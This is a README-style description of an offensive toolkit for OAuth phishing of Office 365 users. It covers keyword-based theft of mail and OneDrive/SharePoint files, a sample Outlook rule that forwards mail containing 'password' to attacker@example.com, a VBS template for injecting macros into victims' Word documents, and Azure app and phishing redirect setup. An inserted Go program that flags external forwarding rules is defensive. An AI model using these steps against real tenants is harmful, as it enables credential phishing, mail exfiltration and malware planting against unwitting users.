O365-Attack-Toolkit - A Toolkit To Attack Office365

o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information.
Some of the implemented features are:
  • Extraction of keyworded e-mails from Outlook.
  • Creation of Outlook Rules.
  • Extraction of files from OneDrive/Sharepoint.
  • Injection of macros on Word documents.

Architecture


The toolkit consists of several components:

Phishing endpoint
The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.

Backend services
Afterwards, the token will be used by the backend services to perform the defined attacks.

Management interface
The management interface can be used to inspect the information extracted from the Microsoft Graph API.

Features

Outlook Keyworded Extraction
User emails can be extracted by this toolkit using keywords. For every keyword defined in the configuration file, all the emails that match it will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.

Onedrive/Sharepoint Keyworded Extraction
The Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For every keyword defined in the configuration file, all the documents that match it will be downloaded and saved locally. The operator can view the documents using the management interface.

Outlook Rules Creation
The Microsoft Graph API supports the creation of Outlook rules. You can define different rules by putting the rule JSON files in the rules/ folder. The rule format is documented at https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs
Below is an example rule that, when loaded, will forward every email that contains "password" in the body to attacker@example.com.
{
  "displayName": "Example Rule",
  "sequence": 2,
  "isEnabled": true,
  "conditions": {
    "bodyContains": [
      "password"
    ]
  },
  "actions": {
    "forwardTo": [
      {
        "emailAddress": {
          "name": "Attacker Email",
          "address": "attacker@example.com"
        }
      }
    ],
    "stopProcessingRules": false
  }
}
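From the defender's side, the rule shape above is exactly what a mailbox audit has to look for. The following Go program is an added example, not part of the toolkit or this README: it parses an array of messageRule objects in the format shown (the "value" array the Graph messageRules endpoint returns) and reports enabled rules whose forwardTo or redirectTo action points outside the tenant. The tenant domain `corp.example`, the sample rules and all function names are constructed assumptions.

```go
package main

import (
	"encoding/json"
	"strings"
)
// Subset of the Graph messageRule schema needed to spot forwarding rules.
type recipient struct {
	EmailAddress struct{ Address string `json:"address"` } `json:"emailAddress"`
}
type messageRule struct {
	DisplayName string `json:"displayName"`
	IsEnabled   bool   `json:"isEnabled"`
	Actions     struct {
		ForwardTo  []recipient `json:"forwardTo"`
		RedirectTo []recipient `json:"redirectTo"`
	} `json:"actions"`
}
// ExternalForwardingRules parses the "value" array of GET /me/mailFolders/inbox/messageRules and
// returns the displayName of each enabled rule that forwards or redirects mail outside tenantDomain.
func ExternalForwardingRules(rulesJSON []byte, tenantDomain string) ([]string, error) {
	var rules []messageRule
	if err := json.Unmarshal(rulesJSON, &rules); err != nil {
		return nil, err
	}
	suffix := "@" + strings.ToLower(tenantDomain)
	var flagged []string
	for _, r := range rules {
		// Copy ForwardTo first so appending RedirectTo cannot write into its spare capacity.
		targets := append(append([]recipient{}, r.Actions.ForwardTo...), r.Actions.RedirectTo...)
		for _, rc := range targets {
			if r.IsEnabled && !strings.HasSuffix(strings.ToLower(rc.EmailAddress.Address), suffix) {
				flagged = append(flagged, r.DisplayName)
				break // one external target is enough to flag the rule
			}
		}
	}
	return flagged, nil
}
// SampleRules is constructed input: the README's example rule plus a benign internal redirect.
const SampleRules = `[{"displayName":"Example Rule","sequence":2,"isEnabled":true,"conditions":
 {"bodyContains":["password"]},"actions":{"forwardTo":[{"emailAddress":{"name":"Attacker Email",
 "address":"attacker@example.com"}}],"stopProcessingRules":false}},{"displayName":"Team alias",
 "isEnabled":true,"actions":{"redirectTo":[{"emailAddress":{"address":"helpdesk@corp.example"}}]}}]`
func main() {
	flagged, err := ExternalForwardingRules([]byte(SampleRules), "corp.example")
	if err != nil {
		panic(err)
	}
	println("rules forwarding outside the tenant:", strings.Join(flagged, ", ")) // Example Rule
}
```

Running the same check over every mailbox in the tenant (with the Graph application permission to read mailbox rules) gives a quick sweep for rules planted by this kind of toolkit.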

Word Document Macro Backdooring
User documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document will be changed to .doc in order for the macro to be supported by Word. It should be noted that after backdooring the documents, they cannot be edited online, which increases the chances of our payload executing.
This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built from the template below and executed, so don't panic if you see wscript.exe running.
Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("{DOCUMENT}")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"
wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0
wdApp.Quit

How to set up

Compile
cd %GOPATH%
git clone https://github.com/0x09AL/o365-attack-toolkit
cd o365-attack-toolkit
dep ensure
go build

Configuration
An example configuration is shown below:

Deployment
Before using this toolkit for the first time you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.


After creating the application, copy the Application ID and change it in static/index.html.
The URL (external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL.


The Redirect URL should be the URL that will be used to host the phishing endpoint, in this case https://myphishingurl.com/


Make sure to check both the boxes as shown below:


It should be noted that you can run this tool on any operating system that Go supports, but the Macro Backdooring functionality will only work on Windows.
The look of the phishing page can be changed in static/index.html.

Security Considerations
Apart from all the features this tool has, it also opens up some attack surface on the host running the tool. First, the Macro Backdooring functionality will open the Word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the extraction of files can download malicious files, which will be saved on your computer.
The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and the Microsoft Graph API.

Management Interface
The management interface allows the operator to browse the information that has been extracted.

Users view


View User Emails


View Email